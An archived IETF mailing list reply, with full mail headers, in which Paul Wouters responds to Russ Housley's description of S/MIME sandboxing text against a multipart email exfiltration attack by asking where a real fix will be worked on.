Re: More mail madness?

Paul Wouters <paul@nohats.ca> Mon, 14 May 2018 16:35 UTC

Return-Path: <paul@nohats.ca>
X-Original-To: ietf@ietfa.amsl.com
Delivered-To: ietf@ietfa.amsl.com
Received: from localhost (localhost [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 7A4AA12DFDB for <ietf@ietfa.amsl.com>; Mon, 14 May 2018 09:35:18 -0700 (PDT)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -2
X-Spam-Level:
X-Spam-Status: No, score=-2 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1] autolearn=ham autolearn_force=no
Authentication-Results: ietfa.amsl.com (amavisd-new); dkim=pass (1024-bit key) header.d=nohats.ca
Received: from mail.ietf.org ([4.31.198.44]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id kr1JuNV9aTn1 for <ietf@ietfa.amsl.com>; Mon, 14 May 2018 09:35:15 -0700 (PDT)
Received: from mx.nohats.ca (mx.nohats.ca [193.110.157.68]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id 95569126C22 for <ietf@ietf.org>; Mon, 14 May 2018 09:35:15 -0700 (PDT)
Received: from localhost (localhost [IPv6:::1]) by mx.nohats.ca (Postfix) with ESMTP id 40l5sD03BZz3Dk; Mon, 14 May 2018 18:35:11 +0200 (CEST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=nohats.ca; s=default; t=1526315712; bh=07zNMHQLxrynsZHkjOf5GEFuH4/5Ozo1yiQkus/TGTM=; h=Subject:From:In-Reply-To:Date:Cc:References:To; b=cKZmsUqG6Z8QhIOxaQNyaLlHIKD8ppM91k+VppQ76tvGwjEOq/2NlPnfqwzIwMSL5 8zCYfXiuMaNkl6T///icbFU1toiGVRODNvmsi65y5HsGtojr7rKRHPPwXJOybDk3+A ty+kSDo3BwKaqwSnGcBhfDh82DAJ/cYEnay23xhk=
X-Virus-Scanned: amavisd-new at mx.nohats.ca
Received: from mx.nohats.ca ([IPv6:::1]) by localhost (mx.nohats.ca [IPv6:::1]) (amavisd-new, port 10024) with ESMTP id s7HQIVyRi7ta; Mon, 14 May 2018 18:35:10 +0200 (CEST)
Received: from bofh.nohats.ca (bofh.nohats.ca [76.10.157.69]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by mx.nohats.ca (Postfix) with ESMTPS; Mon, 14 May 2018 18:35:09 +0200 (CEST)
Received: from [192.168.12.79] (nat05.wpe01.151FrontStW01.YYZ.beanfield.com [66.207.198.84]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by bofh.nohats.ca (Postfix) with ESMTPSA id 0515C79AAD; Mon, 14 May 2018 12:35:08 -0400 (EDT)
DKIM-Filter: OpenDKIM Filter v2.11.0 bofh.nohats.ca 0515C79AAD
Content-Type: text/plain; charset="utf-8"
Mime-Version: 1.0 (1.0)
Subject: Re: More mail madness?
From: Paul Wouters <paul@nohats.ca>
X-Mailer: iPhone Mail (15E302)
In-Reply-To: <B0CE44DF-DC7C-4411-B1CC-30B87E38D3F6@vigilsec.com>
Date: Mon, 14 May 2018 12:35:06 -0400
Cc: Phillip Hallam-Baker <phill@hallambaker.com>, IETF <ietf@ietf.org>
Content-Transfer-Encoding: quoted-printable
Message-Id: <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca>
References: <CAMm+LwiOfdptL6u=SyCtQnz7xKrJD6HTDkKs+JGeHf54CSiv8A@mail.gmail.com> <B0CE44DF-DC7C-4411-B1CC-30B87E38D3F6@vigilsec.com>
To: Russ Housley <housley@vigilsec.com>
Archived-At: <https://mailarchive.ietf.org/arch/msg/ietf/AF5AVZ8TEY1Cfmjg5cw66Ic_5D0>
X-BeenThere: ietf@ietf.org
X-Mailman-Version: 2.1.22
Precedence: list
List-Id: IETF-Discussion <ietf.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/ietf>, <mailto:ietf-request@ietf.org?subject=unsubscribe>
List-Archive: <https://mailarchive.ietf.org/arch/browse/ietf/>
List-Post: <mailto:ietf@ietf.org>
List-Help: <mailto:ietf-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/ietf>, <mailto:ietf-request@ietf.org?subject=subscribe>
X-List-Received-Date: Mon, 14 May 2018 16:35:18 -0000

> On May 14, 2018, at 12:29, Russ Housley <housley@vigilsec.com> wrote:
> 
> We are working on text for S/MIME that says that each portion of a MIME multi-part needs to be handled in its own sandbox.  The direct exfiltration that is described happens because the mail user agent glues the various portions together for display to the user, which in the example on the web page causes an image to be fetched from the attacker's website with the message plaintext as part of the URL.

So that’s the bandaid. What and where will work be done on a solution?

Paul